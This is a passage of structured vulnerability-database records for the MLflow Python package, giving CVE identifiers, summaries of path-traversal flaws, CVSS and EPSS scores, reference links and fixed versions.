scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/blob/b569ebc74c14af593c326143bee2df44a5d59edf/mlflow/server/auth/__init__.py#L752
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-15381
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-15381
5
reference_url https://huntr.com/bounties/149fb2f9-ef4b-4136-a25c-20563451904c
reference_id 149fb2f9-ef4b-4136-a25c-20563451904c
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-27T16:58:49Z/
url https://huntr.com/bounties/149fb2f9-ef4b-4136-a25c-20563451904c
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2452341
reference_id 2452341
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2452341
7
reference_url https://github.com/advisories/GHSA-g6pg-52vf-843h
reference_id GHSA-g6pg-52vf-843h
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-g6pg-52vf-843h
fixed_packages
0
url pkg:pypi/mlflow@3.9.0rc0
purl pkg:pypi/mlflow@3.9.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-axte-ftrh-4bb7
5
vulnerability VCID-fxtg-yezw-hfhr
6
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.9.0rc0
aliases CVE-2025-15381, GHSA-g6pg-52vf-843h
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wphf-gk61-8ube
16
url VCID-xdur-8vs8-jfcy
vulnerability_id VCID-xdur-8vs8-jfcy
summary A vulnerability in MLflow's pyfunc extraction process allows for arbitrary file writes due to improper handling of tar archive entries. Specifically, the use of `tarfile.extractall` without path validation enables crafted tar.gz files containing `..` or absolute paths to escape the intended extraction directory. This issue affects the latest version of MLflow and poses a high/critical risk in scenarios involving multi-tenant environments or ingestion of untrusted artifacts, as it can lead to arbitrary file overwrites and potential remote code execution.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15031.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15031.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-15031
reference_id
reference_type
scores
0
value 0.00333
scoring_system epss
scoring_elements 0.56673
published_at 2026-06-14T12:55:00Z
1
value 0.00333
scoring_system epss
scoring_elements 0.56549
published_at 2026-06-11T12:55:00Z
2
value 0.00333
scoring_system epss
scoring_elements 0.56684
published_at 2026-06-13T12:55:00Z
3
value 0.00333
scoring_system epss
scoring_elements 0.56669
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-15031
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://github.com/mlflow/mlflow/blob/fe4d9be330426904283401f1d2ed914238b6fc37/mlflow/pyfunc/dbconnect_artifact_cache.py#L140
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/blob/fe4d9be330426904283401f1d2ed914238b6fc37/mlflow/pyfunc/dbconnect_artifact_cache.py#L140
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-15031
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-15031
5
reference_url https://huntr.com/bounties/09856f77-f968-446f-a930-657d126efe4e
reference_id 09856f77-f968-446f-a930-657d126efe4e
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-19T13:52:23Z/
url https://huntr.com/bounties/09856f77-f968-446f-a930-657d126efe4e
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2448912
reference_id 2448912
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2448912
7
reference_url https://github.com/advisories/GHSA-fhff-qmm8-h2fp
reference_id GHSA-fhff-qmm8-h2fp
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fhff-qmm8-h2fp
fixed_packages
0
url pkg:pypi/mlflow@3.9.0rc0
purl pkg:pypi/mlflow@3.9.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-axte-ftrh-4bb7
5
vulnerability VCID-fxtg-yezw-hfhr
6
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.9.0rc0
aliases CVE-2025-15031, GHSA-fhff-qmm8-h2fp
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xdur-8vs8-jfcy
17
url VCID-xjux-g847-hyb8
vulnerability_id VCID-xjux-g847-hyb8
summary 
MLflow Tracking Server Artifact Handler Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of MLflow Tracking Server. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the handling of artifact file paths. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26649.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-2033.json
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-2033.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-2033
reference_id
reference_type
scores
0
value 0.1444
scoring_system epss
scoring_elements 0.94611
published_at 2026-06-14T12:55:00Z
1
value 0.18428
scoring_system epss
scoring_elements 0.95386
published_at 2026-06-11T12:55:00Z
2
value 0.18428
scoring_system epss
scoring_elements 0.95405
published_at 2026-06-13T12:55:00Z
3
value 0.18428
scoring_system epss
scoring_elements 0.954
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-2033
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://github.com/mlflow/mlflow/commit/5bf2ec2bd4222a18d78631183ac7f6b752afe8a4
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/5bf2ec2bd4222a18d78631183ac7f6b752afe8a4
4
reference_url https://github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
5
reference_url https://www.zerodayinitiative.com/advisories/ZDI-26-105
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.zerodayinitiative.com/advisories/ZDI-26-105
6
reference_url https://github.com/mlflow/mlflow/pull/19260
reference_id 19260
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-25T04:55:54Z/
url https://github.com/mlflow/mlflow/pull/19260
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2441508
reference_id 2441508
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2441508
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-2033
reference_id CVE-2026-2033
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-2033
9
reference_url https://github.com/advisories/GHSA-q2r8-vmq7-fpx2
reference_id GHSA-q2r8-vmq7-fpx2
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-q2r8-vmq7-fpx2
10
reference_url https://www.zerodayinitiative.com/advisories/ZDI-26-105/
reference_id ZDI-26-105
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-25T04:55:54Z/
url https://www.zerodayinitiative.com/advisories/ZDI-26-105/
fixed_packages
0
url pkg:pypi/mlflow@3.8.0rc0
purl pkg:pypi/mlflow@3.8.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-9mak-nkua-3uhr
5
vulnerability VCID-axte-ftrh-4bb7
6
vulnerability VCID-fxtg-yezw-hfhr
7
vulnerability VCID-kqsy-qu8j-8ugj
8
vulnerability VCID-scm3-63j1-tkf2
9
vulnerability VCID-wphf-gk61-8ube
10
vulnerability VCID-xdur-8vs8-jfcy
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.8.0rc0
aliases CVE-2026-2033, GHSA-q2r8-vmq7-fpx2
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xjux-g847-hyb8
Fixing_vulnerabilities
Risk_score4.5
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@2.22.1